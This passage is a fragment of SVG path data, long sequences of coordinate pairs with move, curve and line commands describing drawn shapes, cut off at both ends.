1218.6025,370.42282 1219,370.50038 1219,372.08279 C 1219,373.286 1218.1043,373.97021 1216.25,374.18358 C 1214.2721,374.41116 1213.5,375.06156 1213.5,376.5 C 1213.5,378.68992 1209.669,379.89152 1208.5353,378.05719 z M 1212.5,377 C 1212.8399,376.45 1212.1915,376 1211.059,376 C 1209.9266,376 1209,376.45 1209,377 C 1209,378.29836 1211.6976,378.29836 1212.5,377 z M 61.582949,377.13421 C 61.152178,376.43721 61.06979,375.59688 61.399864,375.2668 C 62.294825,374.37184 63.270632,375.6881 62.787251,377.13825 C 62.448526,378.15442 62.212984,378.15363 61.582949,377.13421 z M 1176,376 C 1176,375.45 1176.45,375 1177,375 C 1177.55,375 1178,375.45 1178,376 C 1178,376.55 1177.55,377 1177,377 C 1176.45,377 1176,376.55 1176,376 z M 1174.8371,373.32745 C 1173.1853,372.88984 1169.403,366.2637 1170.2955,365.37117 C 1170.552,365.11465 1171.5237,365.66658 1172.4548,366.5977 C 1173.818,367.96082 1173.8899,368.45416 1172.8239,369.13 C 1171.8272,369.76192 1171.9471,369.97316 1173.309,369.98469 C 1174.304,369.99311 1174.8399,370.45 1174.5,371 C 1174.1601,371.55 1174.148,372 1174.4732,372 C 1174.7984,372 1175.4342,371.00034 1175.8862,369.77854 C 1176.6419,367.73561 1176.746,367.81598 1177.1808,370.77854 C 1177.4408,372.55034 1177.3941,373.9478 1177.0768,373.884 C 1176.7596,373.8202 1175.7517,373.56975 1174.8371,373.32745 z M 1243.4411,362.5318 C 1241.8893,361.35803 1241.8126,361.05723 1243.0589,361.0318 C 1243.9162,361.01431 1245.4912,361.66069 1246.5589,362.4682 C 1248.1107,363.64197 1248.1874,363.94277 1246.9411,363.9682 C 1246.0838,363.98569 1244.5088,363.33931 1243.4411,362.5318 z M 741,357.55902 C 741,357.31648 741.45,356.83992 742,356.5 C 742.55,356.16008 743,356.35852 743,356.94098 C 743,357.52344 742.55,358 742,358 C 741.45,358 741,357.80156 741,357.55902 z M 737.54271,356.0691 C 737.22627,355.5571 737.42472,354.85554 737.98369,354.51008 C 738.54266,354.16462 739,354.58352 739,355.44098 C 739,357.19751 738.39994,357.45614 737.54271,356.0691 z M 1124,355 C 1123.0987,354.41754 1122.9754,354.02451 1123.691,354.01531 C 1124.346,354.00689 1125.1601,354.45 1125.5,355 C 1126.2673,356.24153 1125.9211,356.24153 1124,355 z M 1147,355 C 1147,353.70609 1148.7003,353.70609 1149.5,355 C 1149.8399,355.55 1149.4165,356 1148.559,356 C 1147.7016,356 1147,355.55 1147,355 z M 1018.6439,350.01207 C 1019.4637,348.36871 1020.8917,346.5824 1021.8172,346.04248 C 1023.2052,345.23278 1023.2372,345.03532 1022,344.91525 C 1020.4225,344.76217 1017.5213,345.02058 1015,345.53872 C 1014.175,345.70826 1012.1928,345.88141 1010.595,345.92349 C 1007.8438,345.99595 1007.7777,346.09691 1009.3472,347.83115 C 1010.2586,348.83828 1010.7034,349.96328 1010.3355,350.33115 C 1009.3251,351.34157 1007,351.13261 1007,350.03138 C 1007,349.49865 1007.7875,349.3161 1008.75,349.62572 C 1010.087,350.05582 1010.1789,349.95934 1009.1393,349.2169 C 1008.3909,348.68243 1006.9792,348.45418 1006.0022,348.70969 C 1005.0251,348.96519 1003.9234,348.68503 1003.5538,348.08712 C 1003.1571,347.44514 1003.6867,347 1004.8474,347 C 1006.3505,347 1006.6838,346.50697 1006.2646,344.90376 C 1005.7499,342.93578 1006.0281,342.83677 1010.8097,343.28563 C 1013.6109,343.5486 1016.1201,343.54658 1016.3855,343.28115 C 1017.292,342.37464 1026,342.22132 1026,343.11187 C 1026,343.60034 1026.7875,343.99311 1027.75,343.98469 C 1029.1407,343.97252 1029.2156,343.78929 1028.1149,343.09217 C 1026.9994,342.38568 1027.1197,342.0063 1028.7334,341.14267 C 1031.0871,339.883 1032.4393,340.76571 1030.9342,342.57932 C 1030.1267,343.55232 1030.3944,343.70962 1032.0992,343.2638 C 1035.8424,342.28495 1033.3426,344.73368 1029.2361,346.06848 C 1027.1812,346.7364 1025.1571,347.86398 1024.7379,348.57422 C 1024.1267,349.61 1018.5237,353 1017.423,353 C 1017.2747,353 1017.824,351.65543 1018.6439,350.01207 z M 1023.6705,348.41632 C 1024.0047,347.54529 1025.1949,346.49352 1026.3154,346.07904 C 1028.322,345.33674 1028.3199,345.31692 1026.1749,344.75598 C 1024.9772,344.44278 1024.2088,344.52875 1024.4673,344.94703 C 1024.7258,345.36531 1023.801,346.22526 1022.4123,346.85803 C 1021.0235,347.49079 1020.1642,348.45659 1020.5026,349.00425 C 1021.424,350.49508 1022.9839,350.20557 1023.6705,348.41632 z M 1011.25,344.33772 C 1010.5625,344.06031 1009.4375,344.06031 1008.75,344.33772 C 1008.0625,344.61513 1008.625,344.84211 1010,344.84211 C 1011.375,344.84211 1011.9375,344.61513 1011.25,344.33772 z M 1152.4589,351.93347 C 1152.0963,351.34688 1152.0504,350.61628 1152.3567,350.30993 C 1153.1794,349.48729 1156,350.77145 1156,351.96862 C 1156,353.32587 1153.3029,353.2991 1152.4589,351.93347 z M 1167.5,352 C 1168.2997,350.70609 1170,350.70609 1170,352 C 1170,352.55 1169.2984,353 1168.441,353 C 1167.5835,353 1167.1601,352.55 1167.5,352 z M 1111.8643,351.53094 C 1111.6063,351.27296 1109.9197,350.94945 1108.1162,350.81203 C 1105.7797,350.63399 1103.8619,349.4827 1101.4442,346.80657 C 1097.3583,342.28393 1093.979,341.20086 1090.8318,343.40523 C 1089.5796,344.28235 1088.9926,345.01431 1089.5275,345.0318 C 1090.0624,345.0493 1089.6963,345.67325 1088.714,346.41837 C 1086.6497,347.98422 1080.8981,347.07035 1078.1769,344.74416 C 1077.1293,343.84866 1075.0926,343.4653 1072.75,343.72268 C 1068.825,344.15392 1067.9604,343.10769 1070.5,341 C 1072.5222,339.32173 1072.3884,337.76349 1069.9567,334.67204 C 1068.7256,333.10695 1066.4399,331.8035 1064.2067,331.39294 C 1062.168,331.01816 1060.222,330.28357 1059.8821,329.76053 C 1059.5423,329.23748 1057.6318,328.76326 1055.6367,328.70671 C 1053.0788,328.6342 1051.8404,328.07252 1051.4371,326.80194 C 1051.1226,325.81087 1050.4955,325 1050.0437,325 C 1049.5919,325 1049.2847,324.23164 1049.3611,323.29253 C 1049.4389,322.33676 1048.2893,320.992 1046.75,320.23796 C 1043.5974,318.69366 1043.219,317.35075 1045.75,316.68933 C 1047.0669,316.34518 1046.9432,316.20329 1045.25,316.116 C 1042.1606,315.95672 1042.3918,314 1045.5,314 C 1046.875,314 1048,314.48032 1048,315.06739 C 1048,315.69235 1048.8595,315.86197 1050.0737,315.4766 C 1051.2143,315.11461 1053.4273,315.34858 1054.9917,315.99655 C 1057.2425,316.92888 1057.7446,317.678 1057.3984,319.58733 C 1057.1578,320.9143 1057.3894,322 1057.9131,322 C 1058.4367,322 1059.1509,322.9 1059.5,324 C 1060.317,326.57414 1061.6387,326.54358 1063.0439,323.91804 C 1063.9338,322.25518 1063.8289,321.59538 1062.5228,320.64033 C 1061.1828,319.6605 1061.8457,319.46145 1066.1938,319.53799 C 1069.1122,319.58936 1072.4,320.1051 1073.5,320.68407 C 1074.6,321.26304 1077.1682,322.03775 1079.2071,322.40565 C 1082.591,323.01621 1089.0497,325.43686 1094.7334,328.22473 C 1095.9618,328.82725 1097.2378,330.17395 1097.569,331.2174 C 1098.2764,333.44633 1103.2608,335.71757 1103.8125,334.06239 C 1104.0073,333.47808 1105.9026,333 1108.0243,333 C 1110.146,333 1112.1898,332.50196 1112.566,331.89324 C 1113.0528,331.10559 1113.4701,331.14253 1114.0132,332.02135 C 1114.9419,333.52397 1117,332.43497 1117,330.44098 C 1117,329.64844 1117.675,329 1118.5,329 C 1119.325,329 1120,328.60175 1120,328.11501 C 1120,326.90871 1115.4303,324 1113.5352,324 C 1112.6908,324 1112,323.55 1112,323 C 1112,321.71745 1112.1131,321.72901 1116.1279,323.42201 C 1120.7711,325.38005 1124.0669,328.66214 1123.3267,330.591 C 1122.8392,331.86155 1122.5575,331.9087 1121.8761,330.83385 C 1121.2431,329.83513 1121.0268,329.81406 1121.0153,330.75 C 1120.988,332.98326 1120.6282,333.47983 1118.0451,334.84957 C 1114.8259,336.55661 1109,337.18026 1109,335.81782 C 1109,335.25033 1109.7108,335.05877 1110.5795,335.39212 C 1112.5119,336.13368 1117,335.10672 1117,333.92298 C 1117,333.44986 1116.4375,333.25823 1115.75,333.49713 C 1115.0625,333.73602 1112.475,334.1034 1110,334.31353 C 1106.5924,334.60282 1105.4979,335.10684 1105.4913,336.38966 C 1105.4864,337.32141 1104.8663,338.4646 1104.1131,338.93007 C 1102.5291,339.90909 1103.4679,342 1105.4916,342 C 1106.2471,342 1107.1509,342.9 1107.5,344 C 1107.8491,345.1 1108.7795,346 1109.5674,346 C 1110.3553,346 1111,346.34175 1111,346.75945 C 1111,347.17715 1112.0125,348.14945 1113.25,348.92011 C 1115.3196,350.20895 1115.3883,350.18621 1114.1075,348.63649 C 1112.1082,346.21752 1113.2943,345.65335 1115.8036,347.8297 C 1117.4193,349.23097 1117.6492,349.95076 1116.764,350.83604 C 1115.5961,352.00387 1112.742,352.40866 1111.8643,351.53094 z M 1106.0961,344.2849 C 1100.5894,338.70824 1100.54,338.60658 1103,337.92434 C 1105.3891,337.26178 1105.3152,337.1541 1101.3358,335.49751 C 1099.0455,334.54408 1096.9501,332.9172 1096.6794,331.88221 C 1096.2488,330.23556 1084.2817,323.83511 1082.1965,324.13625 C 1081.8134,324.19158 1081.275,324.14912 1081,324.04191 C 1080.725,323.9347 1079.6187,323.68246 1078.5416,323.48139 C 1077.4645,323.28031 1074.9437,322.37651 1072.94,321.47294 L 1069.2968,319.83008 L 1065.3984,323.41026 C 1061.1541,327.30815 1059.5254,327.81161 1058.6384,325.5 C 1057.946,323.69557 1055.8949,323.47668 1056.25,325.24511 C 1056.6028,327.00222 1061.0504,329.63905 1065.0833,330.4821 C 1068.8066,331.26041 1073.0609,333.60461 1072.8633,334.76892 C 1072.6256,336.16848 1075.4448,342 1076.359,342 C 1076.8653,342 1077.8831,342.7875 1078.6208,343.75 C 1079.7933,345.27995 1080.0882,345.31138 1080.9657,344 C 1081.8401,342.69322 1081.9713,342.71041 1081.9847,344.13342 C 1082.0021,345.99157 1086.1763,347.14642 1088.1854,345.84894 C 1089.1648,345.2164 1088.9264,344.84275 1087.25,344.38334 C 1086.0125,344.04421 1085,343.38334 1085,342.91475 C 1085,342.44616 1085.7401,342.34676 1086.6446,342.69386 C 1087.5553,343.04331 1088.7841,342.6946 1089.3982,341.91248 C 1091.8476,338.79287 1096.1886,340.10497 1101.5374,345.58161 C 1104.746,348.86682 1105.8934,349.4722 1109.4734,349.76849 C 1111.2967,349.91939 1110.6948,348.94196 1106.0961,344.2849 z M 1080.7415,339.75 C 1080.4801,338.5125 1080.5912,334.8 1080.9885,331.5 C 1081.7101,325.50514 1081.7107,325.50707 1081.7034,333.75 C 1081.6994,338.2875 1081.5882,342 1081.4564,342 C 1081.3246,342 1081.0029,340.9875 1080.7415,339.75 z M 1073.5,342 C 1073.8399,341.45 1073.4165,341 1072.559,341 C 1071.7016,341 1071,341.45 1071,342 C 1071,343.29391 1072.7003,343.29391 1073.5,342 z M 1054.9847,324.85699 C 1054.9931,324.50333 1054.3953,323.98192 1053.6561,323.69828 C 1052.6845,323.32543 1052.4447,323.87521 1052.7903,325.68325 C 1053.1413,327.51963 1053.4942,327.82743 1054.1188,326.84195 C 1054.5866,326.10388 1054.9763,325.21064 1054.9847,324.85699 z M 1055.9121,320.60595 C 1056.8053,319.52962 1056.703,318.84587 1055.4631,317.60595 C 1053.4635,315.60639 1050.9674,315.55743 1048.4411,317.4682 C 1046.6847,318.79667 1046.6665,318.93942 1048.25,318.9682 C 1049.2125,318.98569 1050,319.675 1050,320.5 C 1050,322.419 1054.3428,322.49683 1055.9121,320.60595 z M 1147.75,349.25399 C 1146.7875,349.03364 1146,348.25348 1146,347.5203 C 1146,346.64705 1146.7443,346.38189 1148.1579,346.75155 C 1149.9782,347.22757 1150.2276,346.97824 1149.7516,345.15793 C 1149.4412,343.97107 1149.5686,343 1150.0346,343 C 1151.7013,343 1152.1486,345.11767 1150.8361,346.7938 C 1149.6616,348.29363 1149.6926,348.34986 1151.092,347.25868 C 1152.6774,346.02253 1154,346.48416 1154,348.27366 C 1154,348.79083 1153.3798,348.976 1152.6219,348.68513 C 1151.8639,348.39427 1150.8514,348.49342 1150.3719,348.90546 C 1149.8923,349.3175 1148.7125,349.47434 1147.75,349.25399 z M 1121,346 C 1121,344.70609 1122.7003,344.70609 1123.5,346 C 1123.8399,346.55 1123.4165,347 1122.559,347 C 1121.7016,347 1121,346.55 1121,346 z M 1137.7495,343.61725 C 1135.1041,341.50788 1133.8388,339.1643 1136.0998,340.56166 C 1136.8727,341.03937 1136.8623,340.61115 1136.0646,339.12068 C 1134.6296,336.43944 1136.1161,336.36578 1138.5,339 C 1139.7006,340.32667 1139.8838,341 1139.0442,341 C 1138.348,341 1138.8013,341.8283 1140.0515,342.84066 C 1141.3018,343.85302 1141.9139,344.93518 1141.4118,345.24547 C 1140.9098,345.55576 1139.2617,344.82306 1137.7495,343.61725 z M 1144.75,343.42803 C 1143.2375,342.60748 1142,341.52143 1142,341.01457 C 1142,340.50772 1143.3472,340.85959 1144.9937,341.79651 C 1146.6402,342.73343 1147.9902,343.8375 1147.9937,344.25 C 1148.0017,345.19988 1148.0286,345.20671 1144.75,343.42803 z M 1046.1545,341.44803 C 1046.3445,340.46777 1047.1055,339.46412 1047.8455,339.2177 C 1048.7061,338.93112 1049.0665,339.41195 1048.8455,340.55197 C 1048.6555,341.53223 1047.8945,342.53588 1047.1545,342.7823 C 1046.2939,343.06888 1045.9335,342.58805 1046.1545,341.44803 z M 1056,337.12244 C 1056,336.08979 1056.6697,334.68911 1057.4882,334.00982 C 1058.694,333.00908 1059.0947,333.08313 1059.6,334.40011 C 1060.2323,336.04778 1058.485,339 1056.8776,339 C 1056.3949,339 1056,338.1551 1056,337.12244 z M 1132.4929,338.01145 C 1132.8289,337.46775 1132.4857,337.26014 1131.7301,337.55009 C 1130.9101,337.86474 1129.8813,337.03484 1129.1781,335.49158 C 1127.5218,331.85639 1127.6682,330.47978 1129.5455,332.03777 C 1130.3955,332.74323 1130.8617,333.91793 1130.5815,334.64822 C 1130.3013,335.3785 1130.3933,335.92812 1130.786,335.86958 C 1132.8319,335.56463 1134,336.15718 1134,337.5 C 1134,338.325 1133.5234,339 1132.941,339 C 1132.3585,339 1132.1569,338.55515 1132.4929,338.01145 z M 1008.3693,335.75 C 1007.9482,334.5125 1007.7534,333.05 1007.9364,332.5 C 1008.1194,331.95 1008.1881,329.77571 1008.0892,327.66824 C 1007.9436,324.56591 1008.2987,323.73465 1009.9547,323.3016 C 1012.5615,322.61989 1012.5083,322.01459 1009.5992,319.25717 C 1007.5145,317.28114 1007.0832,317.1948 1005.974,318.53133 C 1005.2815,319.36568 1004.9883,320.32162 1005.3223,320.65565 C 1005.6563,320.98967 1005.449,322.16103 1004.8616,323.25866 C 1004.0784,324.72202 1004.1138,325.45232 1004.9944,325.99653 C 1006.2949,326.80028 1006.9831,335.00116 1005.75,335.00044 C 1005.3375,335.0002 1005,333.2375 1005,331.08333 C 1005,328.92917 1004.4732,326.99107 1003.8293,326.77645 C 1002.9418,326.48061 1002.9596,325.31154 1003.9027,321.94311 C 1004.5868,319.4994 1005.399,316.375 1005.7075,315 C 1006.5512,311.23965 1008.0022,309.75693 1009.5674,311.0559 C 1010.2835,311.65021 1012.3612,311.95277 1014.1847,311.72827 L 1017.5,311.32007 L 1013.75,311.16004 C 1011.6875,311.07202 1010,310.5798 1010,310.06622 C 1010,309.18679 1010.9072,309.23456 1018.6115,310.51965 C 1020.6894,310.86625 1022.1419,310.53393 1022.984,309.51933 C 1023.6775,308.6837 1024.6398,308 1025.1224,308 C 1026.6115,308 1026.0958,309.90418 1024.0537,311.94632 C 1022.3616,313.63843 1021.1861,313.8154 1015.0537,313.30128 C 1008.8254,312.77912 1008,312.91078 1008,314.42639 C 1008,315.37045 1008.6468,316.78961 1009.4372,317.58009 C 1010.6869,318.82973 1011.092,318.72251 1012.5409,316.75866 C 1013.4795,315.4866 1014.3958,314.98252 1014.6386,315.60466 C 1014.8757,316.21222 1016.1791,316.49726 1017.5349,316.23808 C 1019.509,315.86071 1020,316.17667 1020,317.82441 C 1020,320.53724 1018.5339,321.34825 1016.9909,319.48899 C 1015.5709,317.77799 1012,317.47635 1012,319.06739 C 1012,319.67302 1012.9734,319.89332 1014.25,319.57662 C 1015.4875,319.26963 1015.9375,319.27681 1015.25,319.59256 C 1013.5753,320.36172 1013.6679,322.4795 1015.4406,323.95067 C 1016.2329,324.60823 1016.6347,325.78833 1016.3336,326.57311 C 1015.9993,327.44416 1016.412,328 1017.393,328 C 1019.1424,328 1019.5772,331.54077 1018.1119,333.85325 C 1016.8735,335.80751 1013.1959,333.62862 1012.4034,330.47114 C 1012.0623,329.11201 1011.3338,328 1010.7846,328 C 1010.2354,328 1010.0395,327.33941 1010.3493,326.53203 C 1010.6592,325.72464 1010.4361,324.7695 1009.8536,324.40949 C 1009.1263,323.96001 1008.9748,325.98652 1009.37,330.87747 C 1009.9659,338.25157 1009.6853,339.61797 1008.3693,335.75 z M 1016.3379,330.75 C 1015.9089,330.0625 1015.4271,328.6 1015.2673,327.5 C 1014.82,324.42134 1014.1506,323 1013.148,323 C 1011.5935,323 1011.0373,327.07708 1012.5145,327.64393 C 1013.2775,327.93673 1013.6076,328.85912 1013.2669,329.7468 C 1012.8828,330.74775 1013.0641,331.0784 1013.761,330.64773 C 1014.3664,330.27354 1015.1445,330.42472 1015.4899,330.98369 C 1015.8354,331.54266 1016.343,332 1016.618,332 C 1016.893,332 1016.767,331.4375 1016.3379,330.75 z M 1022.3455,312.25 C 1022.6004,311.8375 1021.77,311.5 1020.5,311.5 C 1019.23,311.5 1018.3996,311.8375 1018.6545,312.25 C 1019.2541,313.22023 1021.7459,313.22023 1022.3455,312.25 z M 1052.0153,335.30902 C 1052.0237,334.86406 1052.4668,333.825 1053,333 C 1053.8354,331.70731 1053.9715,331.73371 1053.9847,333.19098 C 1053.9931,334.12102 1053.55,335.16008 1053,335.5 C 1052.45,335.83992 1052.0069,335.75398 1052.0153,335.30902 z M 988,328.7154 C 988,326.99059 984.74962,325.96383 980.72568,326.41752 C 979.1998,326.58956 977.72289,326.36065 977.44365,325.90883 C 977.16442,325.45702 976.34746,325.31317 975.62819,325.58918 C 974.07712,326.18438 972.32675,324.29243 971.84502,321.5 C 971.65526,320.4 970.92793,319.04904 970.22872,318.49786 C 968.63337,317.24025 967.70031,312.33019 968.47223,309.25462 C 968.98354,307.21741 969.48224,306.99984 972.39014,307.54537 C 975.16197,308.06537 975.80917,307.83772 976.23971,306.19134 C 976.55046,305.00302 977.95752,303.9486 979.76113,303.55246 C 981.41326,303.1896 983.87139,301.67934 985.22363,300.19635 C 986.57588,298.71336 988.7974,296.6 990.16036,295.5 C 991.52332,294.4 993.39481,292.38737 994.31923,291.02749 C 995.24366,289.66762 996.00689,288.99262 996.01531,289.52749 C 996.02373,290.06237 996.46684,289.825 997,289 C 997.77093,287.80707 997.97251,287.78325 997.98469,288.88365 C 998.00004,290.27078 1002.8418,294.99649 1004.25,294.99878 C 1005.8048,295.00131 1004.9009,296.92404 1002.1039,299.56396 C 999.49044,302.03061 999.31092,302.60018 1000.2648,305.39872 C 1000.8462,307.10442 1001.9244,308.85986 1002.6609,309.29969 C 1004.6851,310.50852 1004.2696,311.82261 1001.75,312.18045 C 1000.2171,312.39815 999.46361,313.22187 999.38582,314.76491 C 999.32302,316.01061 998.34551,317.83304 997.21358,318.81477 C 996.08164,319.79649 995.19141,321.25228 995.23529,322.04986 C 995.49902,326.84357 994.90289,328.87174 993.25,328.80433 C 992.2875,328.76508 990.7125,329.06619 989.75,329.47347 C 988.53242,329.98869 988,329.75805 988,328.7154 z M 993.43364,324.40838 C 993.79867,322.95397 993.85843,321.52509 993.56643,321.23309 C 993.27442,320.94109 994.10555,319.75669 995.41337,318.60109 C 996.72119,317.44549 998.08827,315.08618 998.45131,313.35818 C 998.993,310.77986 999.50494,310.29898 1001.3057,310.67699 C 1003.2259,311.08007 1003.2854,311.00012 1001.7818,310.0369 C 999.59202,308.63412 996.61528,302.43151 997.46893,301.05027 C 997.86911,300.40277 996.92812,300 995.01518,300 C 992.96413,300 992.01193,300.44722 992.20616,301.31932 C 992.65688,303.34303 988.74015,309.98583 987.0226,310.11069 C 986.18517,310.17157 984.49504,310.14035 983.26675,310.04132 C 982.03847,309.94229 980.46347,310.22169 979.76675,310.66221 C 977.64126,312.00613 973.11606,311.84477 971.90187,310.38176 C 971.27115,309.62179 970.30396,309 969.75256,309 C 968.35707,309 969.6694,314.97721 971.51188,317.01312 C 972.33034,317.91752 973,319.54455 973,320.62874 C 973,323.09068 974.82495,325.00441 976.54371,324.34485 C 977.25872,324.07048 978.74258,324.32705 979.84119,324.91501 C 981.32622,325.70977 981.95556,325.66539 982.29433,324.74201 C 982.64331,323.79079 983.04192,323.77436 983.99686,324.67186 C 984.68263,325.31638 985.89072,325.59543 986.68151,325.29197 C 987.57936,324.94744 988.32613,325.53112 988.67004,326.84623 C 989.40939,329.67351 992.5105,328.08647 993.43364,324.40838 z M 975.3717,310.20759 C 975.64106,309.77176 974.98289,309.34899 973.90911,309.26811 C 972.83532,309.18722 972.21806,309.54381 972.5374,310.06052 C 973.24596,311.207 974.70718,311.28281 975.3717,310.20759 z M 988.54413,307.31609 C 989.29283,306.31724 990.19412,304.23209 990.547,302.68243 C 991.25371,299.57887 991.86849,299.20097 997,298.71579 C 998.925,298.53378 1001.4,297.87137 1002.5,297.24378 C 1004.3808,296.17068 1004.3064,296.03423 1001.25,294.95352 C 999.4625,294.32148 998,293.39837 998,292.90217 C 998,292.40598 997.1,292 996,292 C 994.88889,292 994,292.66667 994,293.5 C 994,294.325 993.59878,295 993.10841,295 C 992.61803,295 991.92419,296.16591 991.56654,297.59092 C 991.13923,299.29344 990.42556,299.99355 989.48521,299.6327 C 988.69813,299.33067 986.73951,300.18975 985.13272,301.54178 C 983.52593,302.8938 981.74589,304 981.17707,304 C 979.7491,304 977,306.87701 977,308.37141 C 977,310.41421 986.90029,309.50916 988.54413,307.31609 z M 1028.7012,327.3679 C 1027.2951,325.96173 1028.0595,325 1030.5833,325 C 1032.2053,325 1033.0118,325.46517 1032.7505,326.25 C 1032.2691,327.69569 1029.73,328.39668 1028.7012,327.3679 z M 1031.1875,326.31689 C 1030.4656,326.02802 1029.6031,326.06354 1029.2708,326.39583 C 1028.9385,326.72812 1029.5292,326.96447 1030.5833,326.92105 C 1031.7483,326.87307 1031.9852,326.63611 1031.1875,326.31689 z M 1034.6732,326.59065 C 1033.8809,324.52616 1034.8702,324 1039.5442,324 C 1042.097,324 1044.2532,324.60018 1045.0201,325.52417 C 1046.6709,327.51331 1045.6511,328.4747 1043.325,327.12207 C 1042.0623,326.38782 1041.9365,326.05145 1042.9167,326.03041 C 1043.6958,326.01368 1044.0442,325.71087 1043.6908,325.3575 C 1043.3375,325.00412 1042.475,325.16707 1041.7742,325.71961 C 1039.4188,327.57668 1035.2479,328.08831 1034.6732,326.59065 z M 938.07895,326.2587 C 938.03553,325.57598 936.71085,323.77598 935.13521,322.2587 C 933.55958,320.74141 931.9381,318.375 931.53193,317 L 930.79343,314.5 L 932.64672,316.83977 C 933.66602,318.12665 935.55071,320.48702 936.83491,322.08504 C 938.11911,323.68306 938.94214,325.55516 938.66386,326.24527 C 938.26681,327.2299 938.1409,327.23279 938.07895,326.2587 z M 963,324.5 C 963,323.47004 963.6554,322.97957 964.75,323.19037 C 967.01315,323.62621 967.01315,325.37379 964.75,325.80963 C 963.6554,326.02043 963,325.52996 963,324.5 z M 1027.5,323 C 1027.1601,322.45 1025.7835,322 1024.441,322 C 1023.0984,322 1022,321.55 1022,321 C 1022,320.45 1023.7579,320 1025.9064,320 C 1029.3204,320 1029.7468,320.25206 1029.2897,322 C 1028.6995,324.25708 1028.3854,324.43259 1027.5,323 z M 1100,322 C 1100,321.45 1100.9266,321 1102.059,321 C 1103.1915,321 1103.8399,321.45 1103.5,322 C 1102.6976,323.29836 1100,323.29836 1100,322 z M 1041.5,321 C 1041.1601,320.45 1041.8085,320 1042.941,320 C 1044.0734,320 1045,320.45 1045,321 C 1045,322.29836 1042.3024,322.29836 1041.5,321 z M 1033,320 C 1033,318.70164 1035.6976,318.70164 1036.5,320 C 1036.8399,320.55 1036.1915,321 1035.059,321 C 1033.9266,321 1033,320.55 1033,320 z M 265.25,318.28172 C 263.84614,317.77814 263.54789,314.39745 264.83703,313.60072 C 265.90893,312.93825 270,315.77375 270,317.17915 C 270,317.88373 269.52185,317.84806 268.58903,317.07389 C 267.50861,316.17722 267.00386,316.18473 266.43452,317.10595 C 265.96314,317.86866 266.11356,318.04785 266.84549,317.59549 C 267.48047,317.20305 268,317.10697 268,317.38197 C 268,318.26503 266.53746,318.74355 265.25,318.28172 z M 1062.029,318.03906 C 1061.2199,317.52739 1060.8931,316.77356 1061.3028,316.3639 C 1061.7124,315.95423 1062.8083,316.37976 1063.7381,317.30952 C 1065.5455,319.11691 1064.4635,319.57873 1062.029,318.03906 z M 271,317.55902 C 271,317.31648 271.45,316.83992 272,316.5 C 272.55,316.16008 273,316.35852 273,316.94098 C 273,317.52344 272.55,318 272,318 C 271.45,318 271,317.80156 271,317.55902 z M 1032.3168,316.70361 C 1031.9478,316.10654 1032.143,315.45235 1032.7505,315.24984 C 1033.4026,315.03248 1033.6422,313.56977 1033.3354,311.67921 C 1032.9428,309.25988 1033.3288,308.01243 1034.914,306.57785 C 1037.3004,304.4182 1038.9526,305.14722 1037.0011,307.49873 C 1035.911,308.81222 1035.9825,308.94395 1037.4749,308.37126 C 1038.9739,307.79605 1039.0752,307.99097 1038.1631,309.69517 C 1037.3891,311.14144 1037.4122,312.01224 1038.2468,312.8468 C 1039.7118,314.31182 1038.486,314.33047 1035.7838,312.88427 L 1033.699,311.76854 L 1035.7392,314.63427 L 1037.7793,317.5 L 1035.3835,317.64459 C 1034.0658,317.72412 1032.6858,317.30068 1032.3168,316.70361 z M 608.54271,314.0691 C 608.22627,313.5571 608.42472,312.85554 608.98369,312.51008 C 609.54266,312.16462 610,312.58352 610,313.44098 C 610,315.19751 609.39994,315.45614 608.54271,314.0691 z M 927.78167,311.05797 C 926.84514,309.96419 926.46015,308.83364 926.92614,308.54565 C 928.00802,307.87701 930.30262,310.59215 929.83676,311.98971 C 929.64299,312.57104 928.71819,312.15176 927.78167,311.05797 z M 33.5,308 C 33.160081,307.45 33.358524,307 33.940983,307 C 34.523442,307 35,307.45 35,308 C 35,309.28138 34.291939,309.28138 33.5,308 z M 923,306 C 922.20686,305.50981 921.88989,304.77678 922.29563,304.37104 C 922.70137,303.9653 923.55833,304.15833 924.2,304.8 C 925.71091,306.31091 924.86759,307.15423 923,306 z M 1026,302 C 1026,301.45 1026.45,301 1027,301 C 1027.55,301 1028,301.45 1028,302 C 1028,302.55 1027.55,303 1027,303 C 1026.45,303 1026,302.55 1026,302 z M 965,301.05902 C 965,300.54148 965.45,299.83992 966,299.5 C 966.55,299.16008 967,299.58352 967,300.44098 C 967,301.29844 966.55,302 966,302 C 965.45,302 965,301.57656 965,301.05902 z M 1030,300.05902 C 1030,299.54148 1030.45,298.83992 1031,298.5 C 1031.55,298.16008 1032,298.58352 1032,299.44098 C 1032,300.29844 1031.55,301 1031,301 C 1030.45,301 1030,300.57656 1030,300.05902 z M 1006.5,296 C 1007.2997,294.70609 1009,294.70609 1009,296 C 1009,296.55 1008.2984,297 1007.441,297 C 1006.5835,297 1006.1601,296.55 1006.5,296 z M 1023.25,293.32558 C 1021.052,291.7923 1019.8845,286.19253 1022.0407,287.52514 C 1022.613,287.87889 1022.8316,288.95527 1022.5263,289.9171 C 1022.1407,291.13204 1022.7604,292.02545 1024.5565,292.84377 C 1026.9235,293.92226 1027.088,293.85272 1026.5063,292.01978 C 1025.5879,289.1263 1026.8093,287.60063 1028.7624,289.20144 C 1030.1538,290.34181 1030.2592,290.19545 1029.6278,288 C 1028.4731,283.98501 1028.2166,281 1029.0262,281 C 1030.1755,281 1031.1494,287.55664 1030.4274,290.43321 C 1030.075,291.83734 1029.4318,292.76687 1028.9981,292.49883 C 1028.5644,292.23079 1027.9515,292.6839 1027.6362,293.50574 C 1026.9258,295.35699 1026.1144,295.32366 1023.25,293.32558 z M 1010.2708,293.39583 C 1010.6031,293.06354 1011.4656,293.02802 1012.1875,293.31689 C 1012.9852,293.63611 1012.7483,293.87307 1011.5833,293.92105 C 1010.5292,293.96447 1009.9385,293.72812 1010.2708,293.39583 z M 1013.5188,289.75 C 1014.4288,286.61713 1019.0954,282.83432 1020.5555,284.04602 C 1021.3145,284.67598 1022.4867,284.31247 1024.0397,282.96553 L 1026.3802,280.93571 L 1024.0525,278.71785 C 1022.7722,277.49803 1022.0145,277.02407 1022.3686,277.66459 C 1022.7227,278.30511 1022.6722,279.01886 1022.2562,279.25069 C 1021.8403,279.48253 1022.0625,279.53509 1022.75,279.36749 C 1023.4375,279.19989 1024,279.49865 1024,280.03138 C 1024,280.56412 1023.19,281 1022.2,281 C 1021.21,281 1019.8791,281.52093 1019.2424,282.15762 C 1018.3656,283.03444 1017.7106,283.00474 1016.5424,282.03517 C 1014.7639,280.55917 1014.5156,279 1016.059,279 C 1016.6415,279 1016.8399,279.45 1016.5,280 C 1016.1601,280.55 1016.3585,281 1016.941,281 C 1018.819,281 1018.0656,278.82991 1016,278.28975 C 1014.0557,277.7813 